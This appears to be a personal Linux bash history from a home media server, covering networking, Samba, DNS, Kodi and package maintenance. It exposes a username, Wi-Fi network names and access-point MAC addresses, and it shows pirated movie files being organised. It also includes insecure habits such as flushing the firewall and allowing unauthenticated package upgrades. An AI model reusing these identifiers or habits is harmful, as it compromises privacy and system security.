/var/lib/samba/wins.tdb +sudo systemctl restart smbd.service +sudo systemctl restart nmbd.service +dig overstock.com +dig -av overstock.com +man dig +dig --type=any overstock.com +dig any overstock.com +dig ANY overstock.com +sudo ifup eth0 +lo +sudo iptables -L +sudo iptables -L -n --line-numbers +less /etc/iptables/rules.v4 +sudo iptables -I INPUT -p udp -m state --state NEW -m udp --dport 123 -j ACCEPT +sudo iptables -L -n --line-numbers +sudo iptables -I INPUT 12 -p udp -m state --state NEW -m udp --dport 123 -j ACCEPT +sudo iptables -L -n --line-numbers +less /etc/services +sudo iptables -L -n --line-numbers +sudo iptables -I INPUT 12 -p tcp -m state --state NEW -m tcp --dport 123 -j ACCEPT +sudo iptables -L -n --line-numbers|less +sudo su -0 +sudo su - +sudo tdbtool /var/lib/samba/wins.tdb +sudo systemctl restart smbd.service +sudo systemctl restart nmbd.service +clear +ls +iptables -L +sudo iptables -L +lo +wiload.sh +sudo ifdown eth0 +sudo ifup eth0 +sudo apt-get update +cat /etc/resolv.conf +nslookup cnn.com localhost +sudo /etc/init.d/bind9 restart +nslookup cnn.com localhost +sudo iwconfig wlan0 essid "Lct4vets" mode Managed channel 10 ap 14:91:82:F6:2B:1F +sudo apt-get update +sudo apt-get upgrade +sudo tdbtool /var/lib/samba/wins.tdb +sudo systemctl restart nmbd.service +nslookup cnn.com localhost +sudo /etc/init.d/bind9 start +sudo /etc/init.d/bind9 restart +nslookup cnn.com localhost +ls +lo +df -h +ls +mv Jumanji\ \(1995\)\ \[YTS.AG\]/ Jumanji\ \(1995\) +ll +ll Jumanji\ \(1995\)/ +mv Jumanji\ \(1995\)/ /media/bjohnston/Acer/Users/bjohnston/Videos/ +ls +sudo apt-get update +sudo apt-get upgrade +clear +sudo ifup eth0 +nslookup cnn.com +nslookup cnn.com localhost +sudo su - +lo +locate libcec.so.3 +sudo apt-cache search libcec +sudo apt-get install libcec-platform1v5 +locate libcec.so.3 +locate libcec +less kodi.log +tail -f kodi.log +lo +wiload.sh +sudo ifup eth0 +lo +wiload.sh +lo +sudo dhclient eth0 +sudo pkill -9 dhclient +ps aux|grep dhcl +sudo ifdown eth0 +sudo ifup eth0 +ping +route +route-n +route -n +ping +ip neighbor +sudo ifdown eth0 +sudo dhclient eth0 +sudo ifdown eth0 +sudo dhclient eth0 +sudo ifdown eth0 +sudo pkill -9 dhclient +sudo ifdown eth0 +sudo ifconfig eth0 down +sudo ifdown eth0 +sudo dhclient eth0 +sudo pkill -9 dhclient +sudo ifdown eth0 +sudo iwconfig wlan0 essid "Lct4vets" mode Managed channel 10 ap 14:91:82:F6:2B:1F +nslookup clock.xmission.com +nslookup time.nist.org +nslookup time.nist.gov +roiute +route +sudo ifdown eth0 +sudo ifup eth0 +ls +strings config\ \(1\).bin |less +ll +ls -ltr +strings config\ \(2\).bin |les +strings config\ \(2\).bin |less +ll +mv "config (2).bin" TP-Reports-backup.bin +ll +ll|grep bin +rm config.bin +rm config\ \(1\).bin +ll +rm WinToHDDProfessional25-db29si* +ll +lll +mv *.torrent tmp/Torrents/ +ll +sduo ifdown eth0 +sudo ifdown eth0 +sudo ifconfig eth0 down +sudo ifup eth0 +ifconfig +route -n +sudo ifdown eth0 +sudo dhclient eth0 +sudo ifup eth0 +sudo nmap -sT +sudo iwconfig wlan0 down +sudo ifconfig wlan0 down +sudo vim /etc/networks +sudo vim /etc/network/interfaces +sudo systemctl stop bind9.service +ping +sudo dhclient eth0 +sudo ifdown eth0 +sud ficonfig eth0 +sudo ifconfig eth0 dwn +sudo ifconfig eth0 down +sudo dhclient eth0 +sudo pkill -9 dhclient +sudo su - +ls +ls +ll +ls +ll +ls +mv Singin\'\ In\ The\ Rain\ \(1952\)/ "Singin' in the Rain (1952)" +ll +ls +la +mv Singin\'.In.The.Rain.1952.720p.BluRay.x264-\[YTS.AG\].mp4 Singin\'.in.the.Rain.1952.720p.BluRay.x264.mp4 +ll +la +ls +mv The\ Transformers\ The\ Movie\ \(1986\)/ "The Transforers: The Movie (1986) +" +mv The\ Transforers\:\ The\ Movie\ \(1986\) The\ Transforers\:\ The\ Movie\ \(1986\) +ls +mv The\ Transforers\:\ The\ Movie\ \(1986\) "The Transformers: The Movie" +mc +ls +ls +mv The.Transformers.The.Movie.1986.720p.BluRay.x264-\[YTS.AG\].mp4 The.Transformers.The.Movie.1986.720p.BluRay.x264.mp4 +ls +ls +ll +less Singin\'.in.the.Rain.1952.720p.BluRay.x264.nfo +ls +ll +s +s +ls +s +ls +ll +less Stranger\ Things.nfo +ls +ls +la +;s +ls +ln +ln --help +ls +ln -sn Stranger\ Things/Season\ 2/ "Stranger Things 2" +ls +ll +wiload.sh +sudo iwconfig wlan0 essid "Lct4vets" mode Managed channel 10 ap 14:91:82:F6:2B:1F +sudo su - +lo +sudo ifdown eth0 +sudo ifup eth0 +man set +man bash +s +ls +ll +mv Singin\'\ In\ The\ Rain\ \(1952\)\ \[YTS.AG\]/ Singin\'\ In\ The\ Rain\ \(1952\) +ll +mv The\ Transformers\ The\ Movie\ \(1986\)\ \[YTS.AG\]/ The\ Transformers\ The\ Movie\ \(1986\) +man bash +tail -f .kodi/temp/kodi.log +less .kodi/temp/kodi.log +tail -f .kodi/temp/kodi.log +lo +sudo ifdown eth0 +sudo ifup eth0 +link +links +ping +links +clear +ls +ll +ls +clear +ls +lo +ls +ls +ll +la +ls +ls +ll +unlink Stranger\ Things +unlink Stranger\ Things\ 2 +ls +ls +mv Season\ 2/ "Stranger Things 2" +ll +mv Stranger\ Things\ 2/ .. +ll +ll +mv Stranger\ Things ~/tmp/ +ll +la +ls +la +clear +ls +ll +sudo iwconfig wlan0 essid "Lct4vets" mode Managed channel 10 ap 14:91:82:F6:2B:1F +pkill -9 chrome +wiload.sh +ls +lsmod | grep mouse +sudo modprobe -r psmouse && modprobe psmouse +sudo modprobe psmouse +dmesg +wiload.sh +vim bin/wiload.sh +ls +ls +la +sudo su - +mysql -u bjohnston -p -h localhost +tail -f .kodi/temp/kodi.log +log +ls +ls +sudo apt-get update +sudo vim /etc/sysctl.conf +sudo sysctl -p +links google.com +tlop +top +pkill -1 codi +pkill -1 cody +ps aux |grep cody +ps aux |grep -i kodi +ps aux |grep -i conky +pkill -1 conky +sudo vim /etc/sysctl.conf +lo +sudo iwconfig wlan0 essid "Lct4vets" mode Managed channel 10 ap 14:91:82:F6:2B:1F +lo +sudo sysctl -p +lo +sudo tdbtool /var/lib/samba/wins.tdb +sudo systemctl restart smbd.service +sudo systemctl restart nmbd.service +lo +testparm +clear +ls +rm *.log +s +ls +sudo vim /etc/samba/smb.conf +ls /var/ +ls /var/opt/ +sudo su - +ls +ls +ls +vim default.py +jobs +vim iface.py +which python +ll /usr/bin/py +ll /usr/bin/python +python --version +python --help +fg +vim directory.py +chmod +x directory.py +./directory.py +jobs +la +rm .wiload.sh.swp +rm nohup.out +rm .iface.py.un~ +rm .directory.py.un~ +la +mkdir stuff +la +ls +file directory.py +./directory.py +directory.py +directory.py |less +less .xinputrc +mdmsetup +sudo mdmsetup +sudo vim /etc/mdm/mdm.conf +lo +sudo vim /etc/mdm/mdm.conf +ls +less locale.conf +ls +clear +less Xsession +ls Init/ +ls modules/ +ls SuperInit/ +directory.py +sudo vim /etc/mdm/mdm.conf +sudo mdmsetup +ls /etc/default/ +ps aux |grep rygel +lo +ls +vim defaults.conf +ls +vim distro.conf +ll +file mdmsetup.glade +less mdmsetup.glade +ls +ll +ls recovery/ +ls recovery/mdm.conf +less recovery/mdm.conf +:q +ls +directory.py +directory.py |less +sudo su - +sudo ifdown etho +sudo ifconfig eth0 down +lo +sudo updatedb +l +lo +wiload.sh +lo +wiload.sh +sudo updatedb +sudo apt-get update +sudo apt-get upgrade +sudo apt-get update +sudo apt-get upgrade +lo +wiload.sh +lo +sudo tdbtool /var/lib/samba/wins.tdb +sudo systemctl restart smbd.service +sudo systemctl restart nmbd.service +lo +sudo systemctl restart avahi-daemon +lo +log +sudo iptables -L +sudo su - +lo +sudo su - +wiload.sh +lo +sudo updatedb +sudo apt-get update +sudo apt-get upgrade +sudo apt-get autoremove +lo +sudo apt-get update +sudo apt-get upgrade -y +o +lo +suo su - +sudo su - +mysql -u bjohnston -p -h localhost +o +lo +alias +klog +sudo reboot +log +pkill -1 kodi +lo +locate rogue one +locate rogue one|less +ls +nslookup cnn.com +sudo iptables -F +sudo iptables -L +clear +sudo /etc/init.d/avahi-daemon restart +ls +ll +rm Rogue\ One.nfo +ll +klog +log +ll +locate Dr.trange +locate Dr.trange* +locate Dr.Strange* +find . -t f -name "Dr.Strange*" -print +find . -type f -name "Dr.Strange*" -print +ll +mv Dr.Strange.2016.BRRip.XviD.AC3-ETRG .. +ll +ll +ls +ll +s +ls +ll +rm -rf Dr.Strange.2016.BRRip.XviD.AC3-ETRG/ +ls +lo +pkill -1 kodi +lo +ll +ls Subs/ +rm RARBG.mp4 +rm RARBG.nfo +ll +sudo iptables -F +ll|grep -i beauty +mv Beauty\ and\ the\ Beast\ \(2017\)/ "Beauty And The Beast (1991)" +ls -ltr +ll|grep -i beauty +mv Beauty\ And\ The\ Beast\ \(2017\)\ \[YTS.AG\]/ "Beauty And The Beast (2017)" +ls -ltr +ll|grep -i beau +ls +ll +mv Beauty\ and\ the\ Beast\ \(2017\).mp4 Beauty\ and\ the\ Beast\ \(1991\).mp4 +ll +;; +ll +mv Beauty\ and\ the\ Beast\ \(2017\)-fanart.jpg Beauty\ and\ the\ Beast\ \(1991\)-fanart.jpg +ll +mv Beauty\ and\ the\ Beast\ \(2017\).nfo Beauty\ and\ the\ Beast\ \(1991\).nfo +LL +ll +mv Beauty\ and\ the\ Beast\ \(2017\)-poster.jpg Beauty\ and\ the\ Beast\ \(1991\)-poster.jpg +ll +mv Beauty\ And\ The\ Beast\ \(1991\)/ Beauty\ and\ the\ Beast\ \(1991\)/ +ll +ll +clear +ll +rm Beauty\ and\ the\ Beast\ \(1991\)-fanart.jpg +rm *.jpg +ll +rm *.nfo +ll +ll|grep -i beau +ll Beauty\ And\ The\ Beast\ \(2017\)/ +ls +ll +rm Thumbs.db +ll +mv Beauty.And.The.Beast.2017.720p.BluRay.x264-\[YTS.AG\].mp4 "Beauty And The Beast (2017).mp4" +ll +rm *.jpg +rm *.nfo +ll +ll~ +ll +ll +sudo apt-get update +sudo apt-get upgrade +lo +sudo ifdown eth0 +sudo ifconfig eth0 down +updatedb +sduo updatedb +sudo updatedb +bg +clear +ls +rm kodi_crashlog-20180103_082326.log +ll +clear +ls +lo +sudo apt-get update +sudo apt-get upgrade +sudo apt-get upgrade --ignore-hold +sudo apt-get upgrade --ignore-hold --allow-unauthenticated +lo +sudo ifconfig eth0 down +lo +man apt-get +sudo su - +ls +ls +ll +ls +ll +ls +ls +ls +ls +ls +ls +ls +ls +ls +ll|grep -i shine +ll|grep -i fly +lo +sudo su - +lo +sudo ifconfig eth0 down +lo +l +ls +mv It\ \(2017\)\ \[YTS.AG\]/ It\ \(2017\) +ll +ls +mv It.2017.720p.BluRay.x264-\[YTS.AG\].mp4 "It (2017).mp4" +ll +lo +wiload.sh +lo +sudo apt-get update +sudo apt-get upgrae -y +sudo apt-get upgrade -y +sudo apt-get autoremove +log +lo +wiload.sh +sudo ifconfig eth0 down +lo +wiload.sh +sudo ifconfig eth0 down +lo +sudo vim /etc/host +sudo vim /etc/hosts +sudo vim /etc/samba/smb.conf +sudo systemctl restart smbd.service +sudo systemctl restart nmbd.service +sudo tdbtool /var/lib/samba/wins.tdb +sudo systemctl restart nmbd.service +lo +ll +vim Insidious.2010.720p.BrRip.x264.YIFY.nfo +ll +clear +lo +sudo apt-get update +sudo apt-get upgrade +apt-cache search mame +sudo apt-get install gnome-video-arcade mame mame-extra mame-tools +mkdir Roms +ls Downloads/ +mv Downloads/rtypeu.zip Roms/ +l +ll +less mame.txt +ll +zcat config.txt.gz |less +sudo updatedb& +locate mame.ini +ls /etc/mame/ +sudo su - +mv Roms roms +mkdir mame +mv roms/ mame +ll +ll mame/roms/ +lo +ls Downloads/ +ll +mv Downloads/rtype.zip mame/roms/ +ls Downloads/ +mv Downloads/sharrier1.zip mame/roms/ +lo +sudo su- +sudo su = +sudo su - +lo +ls +ll +ll . +ll .. +ll +lio +lo +ll +chmod 0775 Public/ +l +chmod 0777 Public/ +cat /etc/hosts +testparm +ls +cp ~/Public/ResetWUEng.zip . +sudo cp ~/Public/ResetWUEng.zip . +ll +vd +ll +ls +ls -ltr +cp ResetWUEng.zip ~/Public/ +ls +ls +ll +ll +sudo su - +wiload.sh +sudo ifconfig eth0 down +lo +sudo vim /etc/samba/smb.conf +lo +sudo su - +lo +ls pu +ls Public/ +sudo updatedb& +lo +ls +ll +rm * +rf ~rf * +ll +rm -rf * +ll +ls +ll +rm -rf Sam/ +ll +lo +wiload.sh +lo +sudo updatedb& +clear +sudo su - +lo +sudo su - +o +lo +vim .bashrc +clear +ls +lo +sudo apt-get update +sudo apt-get upgrade +sudo ifconfig eth0 down +wiload.sh +lo +wiload.sh +sudo ifconfig eth0 down +sudo iwconfig wlan0 essid "jackwifi" mode Managed channel 11 ap 20:25:64:A0:0F:30 +vim bin/wiload.sh +wiload.sh +log +lo +sudo ifconfig eth0 down +lo +sudo apt-get update +lo +wiload.sh +vim bin/wiload.sh +wiload.sh +sudo tdbtool /var/lib/samba/wins.tdb +sudo systemctl restart smbd.service +sudo systemctl restart nmbd.service +ll +lo +log +pkill chrome +pkill -9 chrome +sudo apt-get update +sudo apt-get upgrade +wiload.sh +sudo ifconfig eth0 down +lo +sudo apt-get update +sudo apt-get upgrade -y +export +sudo systemctl restart sshd.daemon +sudo systemctl restart sshd.service +sudo updatedb& +lo +wiload.sh +sudo apt-get update +sudo apt-get upgrade -y +;p +;p\ +lo +wiload.sh +sudo iwconfig wlan0 essid "Lct4vets" mode Managed channel 10 ap 14:91:82:F6:2B:1F +wiload.sh +lo +sudo updatedb& +ifonfg +ifconfig +route +clear +lo +wiload.sh +sudo systemctl restart network-manager.service +lo +sudo iptables -F +sudo iptables -L +cear +clear +sudo sysctl -p +lo +pkill -Kodui +pkill -1 kodi +lo +sudo ifconfig eth0 down +lo +log +klog +wiload.sh +sudo ifconfig eth0 down +lo +sudo iwconfig wlan0 essid "Lct4vets" mode Managed channel 10 ap 14:91:82:F6:2B:1F +sudo su - +less +less wiload.sh +sudo iwconfig wlan0 essid "xfinitywifi" mode Managed channel 6 ap 06:1D:D5:70:E1:90 +wiload.sh +sudo /etc/init.d/wicd restart +wiload.sh +sudo apt-get install --reinstall wicd +sudo updatedb +lo +sudo apt-get install --reinstall wicd +sudo apt-get install --reinstall network-manager +sudo apt-get install --reinstall dhclient +apt-cache search dhclient +apt-cache search dhcp +wiload.sh +sudo ifconfig eth0 down +lo +sudo ifconfig eth0 down +sudo iwconfig wlan0 essid "xfinitywifi" mode Managed channel 6 ap 06:1D:D5:70:E1:90 +sudo ifconfig eth0 down +sudo iwconfig wlan0 essid "xfinitywifi" mode Managed channel 6 ap 06:1D:D5:70:E1:90 +lo +sudo ifconfig eth0 down +lo +wiload.sh +lo +sudo ifconfig eth0 down +lo +log +wiload.sh +systemctl status wicd.service +sudo ifconfig eth0 down +lo +sudo iwconfig wlan0 essid "xfinitywifi" mode Managed channel 6 ap 06:1D:D5:70:E1:90 +sudo ifconfig eth0 down +lo +systemctl status wicd.service +sudo su - +lo] +lo +log +sudo su - +lo +sudo ifconfig eth0 down +wiload.sh +sudo su - +wiload.sh +sudo ifconfig eth0 down +ll +lo +sudo su - +sudo ifconfig eth0 down +lo +wiload.sh +lo +man bash +lo +which dpkg +h +vim .bashrc +lo +vim 3kerns.sh +lo +export +sudo dpkg -l locales +sudo apt-get install --reinstall locales +sudo dpkg -l locales +sudo dpkg-reconfigure locales +vim .bashre +vim .bashrc +h|grep git +git show remote origin +ls .git +less .git/COMMIT_EDITMSG +git push +git commit +git add .bashrc .bash_history .bash_aliases .config/rygel.conf .kodi/userdata/guisettings.xml .kodi/userdata/sources.xml .viminfo +git commit +git push +git status +ll +\rm kodi_crashlog-201801* +ll +chmod 0775 Public/ +ll +sudo su - +sudo vim /etc/hosts +dmesg +l +ping reliant +rm perfdata_mdm +route +vim 3kerns.sh +wiload.sh +links +sudo ifconfig eth0 down +wiload.sh +sudo ifconfig eth0 down +wiload.sh +sudo ifconfig eth0 down +wiload.sh +sudo updatedb& +wiload.sh +sudo su - +sudo ifconfig eth0 down +wiload.sh +sudo dpkg -l |grep mana +sudo apt-get install --reinstall network-manager +sudo dpkg -l |grep dbus +sudo apt-get install --reinstall dbus dbus-x11 +wiload.sh +s +git stats +git status +git status|less +git add .bash_history .bashrc .kodi/userdata/guisettings.xml .viminfo +git commit +git push +sudo updatedb& +sudo vim /etc/sysctl.conf +sudo sysctl -p +sudo apt-get update +sudo apt-get upgrade +less /etc/passwd +sudo vim /etc/aliases +sudo newaliases +rm kodi_crashlog-20180130_165754.log +du -sk * +du -sk * +du -sk * +ls 9 +du -sk * +du -sk * +find . -type f -print +find . -type f -exec rm -f {} \; +du -sk * +file _CACHE_CLEAN_ +less _CACHE_CLEAN_ +du -sk * +du -sk * +rm * +\rm * +du -sk * +c d.. +du -sk *|sort -n +du -si * +du -sk * +df -k . +df -h +df -h . +ld +ldd +alias +du -sk * +du -sk *|sort -n +la +find . -type d -print +find . -type d -dontdecend -print +man find +find . -type d -maxdepth 0 -print +find . -type d -print -maxdepth 0 +find . -maxdepth 0 -type d -print +find . -maxdepth 1 -type d -print +find . -maxdepth 1 -type d -exec du -sk {} \; +git status +git status|less +git add .bash_history .viminfo +git commit +git push +find . -maxdepth 1 -type d -exec du -sk {} \; +du -sk *|sort -n +du -sk *|sort -n +du -sk *|sort -n +la +la +d +sudo su - +sudo updatedb* +sudo updatedb& +top +sudo su - +l. +rm ..bashrc.un~ +rm *~ +rm .*~ +l. +mv comcast.txt Documents/ +l. +dmesg +conky +sudo ifconfig eth0 down +clar +systemctl status wicd.service +sudo systemctl restart wicd.service +systemctl status wicd.service +sudo ifconfig eth0 down +sudo systemctl restart networking +sudo systemctl restart network-manager.service +sudo ifconfig eth0 down +sudo su - +sudo apt-get install --reinstall login +sudo systemctl restart smbd.service +sudo systemctl restart nmbd.service +sudo ifconfig eth0 down +sudo /etc/init.d/bind9 stop +sudo ifconfig eth0 down +sudo /etc/init.d/bind9 restart +sudo /etc/init.d/ntp stop +sudo /etc/init.d/bind9 stop +sudo ifconfig wlan0 down +crontab -l +sudo su - +sudo ifconfig eth0 down +cat /etc/resolv.conf +sudo su - +which pip +pip +sudo apt-get install python-pip +ls /etc/dbus-1/ +less /etc/dbus-1/system. +less /etc/dbus-1/system.conf +sudo apt-get update +sudo apt-get upgrade +sudo apt-get update +sudo apt-get upgrade +pip install --upgrade google-api-python-client +pip install --upgrade pip +vim gdrive.py +ls ~/Downloads/|grep vim +mv ~/Downloads/google_python_style.vim +mv ~/Downloads/google_python_style.vim . +less google_python_style.vim +vim directory.py +vim gdrive.py +la +rm .gdrive.py.un~ +rm gdrive.py~ y +rm gdrive.py~ +la +rm wiload.sh~ +la +sudo updatedb& +sudo ifconfig eth0 down +pkill -1 conky +vim gdrive.py +rm gdrive.py~ +l. +rm .gdrive.py.un~ +l. +sudo su - +vim .bashrc +vim .bash_profile +vim .bashrc +l. +rm .bashrc~ ..bashrc.un~ +git status +ls .vim +s +la +ls colors/ +ls matchit.vim +ls ../ftplugin/ +ls ../doc/ +ls ../colors/ +less ../colors/navajo.vim +l. +less .vimrc +ls .vim/plugin/ +less .vimrc +vim gdrive.py +vim ../.vimrc +locate matchit +vim ../.vimrc +mkdir bundle +mv plugin/google_python_style.vim bundle/ +vim +log +sudo su - +top +mkdir api-client +git clone +links +netstat -plant +man npm +which npm +sudo dpkg -l |grep getty +sudo dpkg -l |grep get +sudo dpkg -l |grep tty +apt-cache search getty +man agetty +apt-cache search getty +apt-cache search agetty +dpkg -l |grep console +apt-cache search console +sudo apt-get install linphone +man vino-server +sudo ifconfig eth0 down +sudo ifup eth0 +ping +sudo cat /etc/resolv. +sudo cat /etc/resolv.conf +sudo cat /etc/resolv.bak +sduo cp /etc/resolv.conf /etc/resolv.bak +sudo cp /etc/resolv.conf /etc/resolv.bak a +sudo cp /etc/resolv.conf /etc/resolv.bak +vim /etc/resolv.bak +sudo vim /etc/resolv.bak +sudo su - +sudo su - +sudo tdbtool /var/lib/samba/wins.tdb +sudo systemctl restart smbd.service +sudo systemctl restart nmbd.service +apt-get update +sudo apt-get update +sudo apt-get upgrade +./start_in_shell.sh +pip install --upgrade google-api-python-client +pkill -9 firefox +pkill -9 chrome +ps aux|less +sudo ifdown eth0 +sudo ifconfig eth0 doewn +sudo ifconfig eth0 down +sudo ifup eth0 +ls -ltr +bzip2 -d ../Downloads/firefox-58.0.1.tar.bz2 +bzip2 -x../Downloads/firefox-58.0.1.tar.bz2 +ls ../Downloads/ -ltr +tar -xvf ../Downloads/firefox-58.0.1.tar +ls /opt/ +sudo su - +sudo ifdown eth0 +sudo ifup eth0 +log +sudo ifdown eth0 +sudo ifup eth0 +sudo apt-get update +sudo apt-get upgrame +sudo apt-get upgrade +l +d .. +less README.md +git pul. +git pull +pkill -9 kodi +nslookup cnn.com +sudo su - +nslookup cnn.com +sudo vim /etc/resolv.conf +nslookup cnn.com +sudo /etc/init.d/bind9 restart +sudo iptables-restore < /etc/iptables/rules.v4 +sudo ifdown eth0 +sudo ifup eth0 +sudo ifdown eth0 +sudo ifup eth0 +sudo su - +ping reliant +sudo ifdown eth0 +cat /etc/resolv.conf +ll /etc/|grep reso +sudo /vim /etc/resolv.conf +sudo vim /etc/resolv.conf +kall +sudo ifup eth0 +ping +sudo ifup eth0 +sudo iptables-restore < /etc/iptables/rules.v4 +sudo ifdown eth0 +sudo ifup eth0 +dmesg +sudo iptables-restore < /etc/iptables/rules.v4 +sudo su - +sudo updatedb & +sudo ifdown eth0 +route +sudo su - +cear +rm kodi_crashlog-2018020*log +less BOA +rm BOA +less tor\ -\ stuff +ls Videos/ +ls tmp/ +ls Templates/ +ls scripts/ +l. +less .xsession-errors +sudo apt-cache search gl4 +sudo apt-cache search gl3 +sudo apt-cache search opengl +cat /dev/null > .xsession-errors +cp /dev/null .xsession-errors +la +less .profile +la +sudo apt-get remove --purge thunderbird +apt-cache search thunderbird +dpkg -l | grep -i thunderbird +s +mv *.torrent tmp/Torrents/ +rm firefox-58.0.1.tar +rm google.csv +rm Google-Contacts.csv +ls explode/ +rm -rf explode/ +ls conky/ +ls APKs/ +celar +la +rm -f avahi* +la +rm cover-letter-sample.odt +mv Michael\ Ba.\ resume.doc ../Documents/ +mv *.pdf PDF/ +l. +la +la|less +ls Music/ +ls OneDrive/ +ls PDF/ +la +d .. +l. +ls bin/ +ls lib/ +ls lib/python2.7/ +ls lib/python2.7/site-packages/ +ls share/ +l. +ls .dbus/ +ls .dbus/session-bus/ +ls .cinnamon/ +ls .cinnamon/configs/ +ls .cinnamon/ +ls .cinnamon/spices.cache/ +ls /opt/ +sudo rm -rf /opt/firefox-old/ +ls / +ls /opt/ +ls /usr/ +ls /usr/src/ +dpkg -l |grep virt +sudo apt-get remove --purge virtualbox-guest-dkms virtualbox-guest-utils virtualbox-guest-x11 +ls /etc/init.d/ +ls /etc/ +sudo updatedb& +l. +sudo su - +cear +rm supportconsole_login.cgi +less tor\ -\ stuff +rm tor\ -\ stuff +la +l. +file .dmrc +less .dmrc +l. +ls .cinnamon/ +ls .dbus/ +ls .gconf/ +ls .gconf/system/ +ls .gconf/system/pulseaudio/ +ls .gconf/system/pulseaudio/modules/ +ls .git +ls .gn +ls .gnome +ls .gnomea +ls .gnome/apps/ +l. +ls .gnome2 +ls .gvfs/ +l. +ls .hplip/ +ls .icons/ +l. +ls .java/ +ls .jftp/ +ls .jxplorer/ +l. +ls .linuxmint/ +ls .msf4/ +less .msf4/history +l. +ls .pu +ls .pulse/ +l. +ls .purple/ +l. +rm -rf .thunderbird/ +l. +less .gitconfig +git status +git add .mysql_history +git add .bash_history .bashrc .viminfo .vimrc +git commit +git push +log +sudo ifup eth0 +ll /etc/ |grep reso +less /etc/resolv.conf +cat /etc/resolv.bak +sudo unlink /etc/resolv.conf +sudo su - +sudo ifdown eth0 +sudo ifup eth0 +sudo iptables-restore < /etc/iptables/rules.v4 +cat /etc/resolv.conf +sudo sysctl -p +sudo ifdown eth0 +sudo ifup eth0 +sudo ifdown eth0 +sudo ifup eth0 +sudo ifdown eth0 +sudo ifup eth0 +sudo iptables-restore < /etc/iptables/rules.v4 +sudo iptables -F +sudo iptables -t nat -F +sudo iptables-restore < /etc/iptables/rules.v4 +iptables -L +sudo iptables -L +sudo su - +less sysctl.new +mkdir gist +git clonest.github.com/techgaun/958e117b730634fa8128 +less sysctl.conf +sudo ifdown eth0 +sudo su - +dmesg +cat /etc/hosts +sudo systemctl restart bind9.service +nslookup clock.xmission.com localhost +nslookup clock.xmission.com +celar +sudo su - +nslookup cnn.com +nslookup cnn.com localhost +sudo systemctl restart bind9.service +nslookup cnn.com localhost +nslookup cnn.com +cat /etc/resolv.conf +ps aux +dmesg +sudo ifup eth0 +sudo iptables -L +sudo systemctl restart bind9.service +sudo systemctl stop bind9.service +sudo systemctl stop bluetooth.service +mv Blade\ Runner\ 2049\ \(2017\)\ \[YTS.AG\]/ Blade\ Runner\ 2049\ \(2017\) +mv Blade.Runner.2049.2017.720p.BluRay.x264-\[YTS.AG\].mp4 Blade.Runner.2049.\(2017\).mp4 +mv PDF/Resume.pdf Documents/Resume/ +ls .. +la +sudo updatedb +locate *~ +for file in `locate *~`;do sudo \rm $file;done +sudo updatedb +locate *~ +git status|less +git commit .bash_history .viminfo .kodi/userdata/guisettings.xml +git push +sudo su - +l. +mv PDF/References.pdf Documents/Resume/ +sudo ifup eth0 +sudo /etc/init.d/bind9 restart +sudo ifdown eth0 +wiload.sh +sudo ifdown eth0 +sudo ifconfig eth0 down +sudo ifup eth0 +cat /etc/hosts +wiload.sh +sudo vim /etc/hosts +cat /etc/resolv.conf +sudo unlink /etc/resolv.conf +sudo vim /etc/resolv.conf +wiload.sh +sudo ifup eth0 +sudo iptables -F +sudo ifup eth0 +pkill -9 firefox +ls Videos/Movies/ +sudo mv Videos/Movies/It\ \(2017\)/ /media/bjohnston/Acer/Users/bjohnston/Videos/ +sudo mv Videos/Movies/The\ Hobbit\ The\ Desolation\ of\ Smaug\ \(2013\)/ /media/bjohnston/Acer/Users/bjohnston/Videos/ +sudo mv Videos/Movies/Everybody\ Wants\ Some\!\!\ \(2016\)\ \[YTS.AG\]/ /media/bjohnston/Acer/Users/bjohnston/Videos/ +lll +sudo mv Blade\ Runner\ 2049\ \(2017\)/ /media/bjohnston/Acer/Users/bjohnston/Videos/ +ls Videos/Movies/ +ls /media/bjohnston/Acer/Users/bjohnston/Videos/ +rm rf /media/bjohnston/Acer/Users/bjohnston/Videos/Thor\ Ragnarok\ \(2017\)/ +rm -rf /media/bjohnston/Acer/Users/bjohnston/Videos/Thor\ Ragnarok\ \(2017\)/ +ls /media/bjohnston/Acer/Users/bjohnston/Videos/ +mv Thor\ Ragnarok\ \(2017\)\ \[YTS.AG\]/ Thor\ Ragnarok\ \(2017\) +mv Thor\ Ragnarok\ \(2017\)/ /media/bjohnston/Acer/Users/bjohnston/Videos/ +log +sudo tdbtool /var/lib/samba/wins.tdb +sudo systemctl restart smbd.service +sudo systemctl restart nmbd.service +sudo iptables-restore < /etc/iptables/rules.v4 +sudo ifdown eth0 +sudo ifup eth0 +sudo iptables-restore < /etc/iptables/rules.v4 +sudo ifdown eth0 +sudo ifup eth0 +wiload.sh +sudo ifdown eth0 +sudo ifup eth0 +vim .config/conky/conky.conf +sudo ifdown eth0 +sudo ifup eth0 +sudo ifdown eth0 +sudo ifup eth0 +sudo ifdown eth0 +sudo ifup eth0 +ki +sudo vim /etc/hosts +sudo netstat -plat +sudo sysctl -p +sudo ifdown eth0 +wiload.sh +sudo systemctl restart wicd.service +wiload.sh +sudo iwconfig wlan0 essid "xfinitywifi" mode Managed channel 6 ap 06:1D:D5:70:E1:90 +sudo nohup wicd& +sudo nohup wicd-gtk * +sudo nohup wicd-gtk & +wiload.sh +sudo ifup eth0 +sudo ifdown eth0 +sudo ifup eth0 +df -k +df -h +ls Videos/Movies/ +sudo ifdown eth0 +sudo ifconfig eth0 down +sudo ifup eth0 +sudo ifdown eth0 +sudo ifconfig eth0 down +sudo ifconfig eth0 down && sudo ifup eth0 +wiload.sh +ping 192.168.`15.10 +ping +sudo ifdown eth0 +sudo ifup eth0 +ping +route +sudo ifdown eth0 +route +sudo ifup eth0 +route +sudo ifdown eth0 +wiload.sh +route +sudo ifup eth0 +route +netstat +linkssmyip.com/ +vim whatsmyip.pl +chmod +x whatsmyip.pl +./whatsmyip.pl +vim whatsmyip.pl +locate quick +locate quick|less +locate apk +sudo cp QuickShortcutMaker_2.4.0_apk-dl.com.apk /var/www/html/ +sudo /etc/init.d/apache2 restart +perldoc LWP +sudo ifdown eth0 +sudo ifup eth0 +wiload\ +wiload.sh +sudo ifdown eth0 +sudo ifup eth0 +log +sudo ifup eth0 +git pull +vd ../../../.. +less requirements-dev.txt +s +git pull +git pull +ls con +ls configs/ +s +ls gist/ +;s +git pul +git pull +dc .. +s. +git pul +git pull +git pull +s +git pull +git pull +git pull +s +s +git pull +git status +git status|less +git add .bash_history .kodi/userdata/RssFeeds.xml .kodi/userdata/guisettings.xml .viminfo +got commit +git commit +git push +sudo su - +less Installation.md +conky -v +sudo apt-get install --reinstall conky-all +conky -v +pkill -9 conky +nohup conky & +l +less INSTALL +ls src/ +ls cmake/ +ls doc/ +ls data/ +ls extras/ +less INSTALL +cp -ra conky ../tmp/ +mv conky/ 